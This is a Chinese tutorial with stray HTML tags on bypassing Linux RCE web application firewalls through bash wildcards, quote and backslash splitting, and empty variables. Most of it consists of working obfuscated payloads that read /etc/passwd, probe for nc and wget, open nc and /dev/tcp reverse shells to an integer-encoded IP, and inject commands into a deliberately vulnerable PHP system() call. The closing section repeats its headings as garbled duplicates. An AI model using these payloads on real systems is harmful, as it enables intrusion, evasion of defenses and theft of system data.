Linux平台下WAF绕过技巧详解<\/h1>

前言<\/h2>
本文详细总结Linux平台下针对RCE(远程命令执行) WAF的绕过技巧，主要利用bash shell的特性来绕过安全防护规则。Windows平台不在本文讨论范围内。<\/p>

技巧一：通配符利用<\/h2>
bash shell提供了多种通配符，可用于命令执行绕过：<\/p>

常用通配符<\/h3>

*<\/code> - 匹配0到多个任意字符<\/li>
?<\/code> - 匹配一个任意字符<\/li>
[ ]<\/code> - 匹配括号内的任一字符<\/li>
[ - ]<\/code> - 匹配编码顺序内的所有字符<\/li>

[^ ]<\/code> - 反向选择，匹配不在括号内的字符<\/li>
<\/ul>
实际应用示例<\/h3>

执行ls -l<\/code>命令：<\/li>
<\/ol>
\/?in\/?s -l
<\/code><\/pre>

读取\/etc\/passwd文件：<\/li>
<\/ol>
\/???\/??t \/??c\/p???w?
<\/code><\/pre>
或更精确的：<\/p>
\/?in\/cat \/?tc\/p?sswd
<\/code><\/pre>

NC反弹shell（IP转换为整数2130706433）：<\/li>
<\/ol>
\/??n\/?c -e \/??n\/b??h 2130706433 3737
<\/code><\/pre>
技巧二：连接符利用<\/h2>
bash允许使用多种方式连接字符串：<\/p>
连接方式示例<\/h3>
echo hello
echo h'ello
echo 'h'ell'o'
<\/code><\/pre>
实际应用示例<\/h3>

读取\/etc\/passwd：<\/li>
<\/ol>
\/'b'i'n'\/'c'a't' \/'e't'c'\/'p'a's's'w'd
<\/code><\/pre>

检测工具是否存在：<\/li>
<\/ol>
\/'b'i'n'\/'w'h'i'c'h' 'n'c  # 检查nc
\/'b'i'n'\/'w'h'i'c'h' 'w'g'e't  # 检查wget
<\/code><\/pre>

反弹shell：<\/li>
<\/ol>
bash -c 'sh -i &>\/dev\/tcp\/2130706433\/3737 0>&1'
<\/code><\/pre>

其他连接方式：<\/li>
<\/ol>

双引号：<\/li>
<\/ul>
\/"b"i"n"\/"w"h"i"c"h" "n"c
<\/code><\/pre>

反斜杠：<\/li>
<\/ul>
\/b\i\n\/w\h\i\c\h n\c
<\/code><\/pre>
技巧三：未初始化的bash变量<\/h2>
bash允许使用未初始化的变量，这些变量值为null但不会中断命令执行。<\/p>
实际应用示例<\/h3>

读取\/etc\/passwd：<\/li>
<\/ol>
cat$a \/etc$a\/passwd$a
<\/code><\/pre>

测试代码示例（PHP）：<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>echo<\/span> "OK"<\/span>;
<\/span><\/span>system<\/span>('dig '<\/span>.<\/span>$_GET['host'<\/span>]);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
利用未初始化变量执行命令：<\/li>
<\/ol>
www.baidu.com;$s\/bin$s\/which$s nc$s
<\/code><\/pre>

反弹shell：<\/li>
<\/ol>
\/bin$s\/nc$s -e \/bin$s\/bash$s 2130706433 3737
<\/code><\/pre>
总结<\/h2>
本文介绍了三种主要的WAF绕过技术：<\/p>

通配符利用<\/strong>：通过?<\/code>、*<\/code>等通配符模糊匹配命令路径<\/li>
连接符利用<\/strong>：使用引号、反斜杠等分隔命令字符<\/li>
未初始化变量<\/strong>：插入null变量分割命令字符串<\/li>
<\/ol>
这些技术可以单独使用，也可以组合使用以提高绕过成功率。关键在于理解bash shell的解析特性，并灵活运用这些特性来构造WAF规则难以检测的命令格式。<\/p>

Linux平台下WAF绕过技巧详解<\/h1>

前言<\/h2> 本文详细总结Linux平台下针对RCE(远程命令执行) WAF的绕过技巧，主要利用bash shell的特性来绕过安全防护规则。Windows平台不在本文讨论范围内。<\/p>

技巧一：通配符利用<\/h2> bash shell提供了多种通配符，可用于命令执行绕过：<\/p>

技巧二：连接符利用<\/h2> bash允许使用多种方式连接字符串：<\/p>

技巧三：未初始化的bash变量<\/h2> bash允许使用未初始化的变量，这些变量值为null但不会中断命令执行。<\/p>

前言<\/h2>
本文详细总结Linux平台下针对RCE(远程命令执行) WAF的绕过技巧，主要利用bash shell的特性来绕过安全防护规则。Windows平台不在本文讨论范围内。<\/p>

技巧一：通配符利用<\/h2>
bash shell提供了多种通配符，可用于命令执行绕过：<\/p>

技巧二：连接符利用<\/h2>
bash允许使用多种方式连接字符串：<\/p>

技巧三：未初始化的bash变量<\/h2>
bash允许使用未初始化的变量，这些变量值为null但不会中断命令执行。<\/p>